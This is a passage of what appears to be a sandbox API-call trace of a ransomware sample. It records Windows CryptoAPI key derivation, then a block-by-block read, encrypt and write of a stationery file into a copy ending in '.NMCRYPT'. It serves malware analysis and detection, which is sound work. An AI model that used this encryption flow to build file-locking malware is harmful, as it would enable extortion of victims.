hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.076] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.076] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.076] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0164.077] CryptHashData (hHash=0x9ad738, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.077] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad3b8) returned 1 [0164.077] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.077] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.077] wcslen (_String="\\\\?\\") returned 0x4 [0164.077] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0164.077] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0164.077] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0164.077] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=4192) returned 1 [0164.077] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.078] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.079] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.079] GetLastError () returned 0x0 [0164.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.106] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.106] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.106] GetLastError () returned 0x0 [0164.106] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.106] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.106] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.106] GetLastError () returned 0x0 [0164.106] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.106] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.106] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.106] GetLastError () returned 0x0 [0164.106] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.106] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.106] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.106] GetLastError () returned 0x0 [0164.106] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.106] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.106] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.107] GetLastError () returned 0x0 [0164.107] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.107] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.107] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.107] GetLastError () returned 0x0 [0164.107] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.107] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.107] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.107] GetLastError () returned 0x0 [0164.107] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.107] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.107] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.107] GetLastError () returned 0x0 [0164.107] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.107] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.107] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.107] GetLastError () returned 0x0 [0164.107] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.107] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.107] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.107] GetLastError () returned 0x0 [0164.107] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.107] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.107] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.107] GetLastError () returned 0x0 [0164.107] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.107] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.108] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.108] GetLastError () returned 0x0 [0164.108] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.108] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.108] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.108] GetLastError () returned 0x0 [0164.108] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.108] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.108] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.108] GetLastError () returned 0x0 [0164.108] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 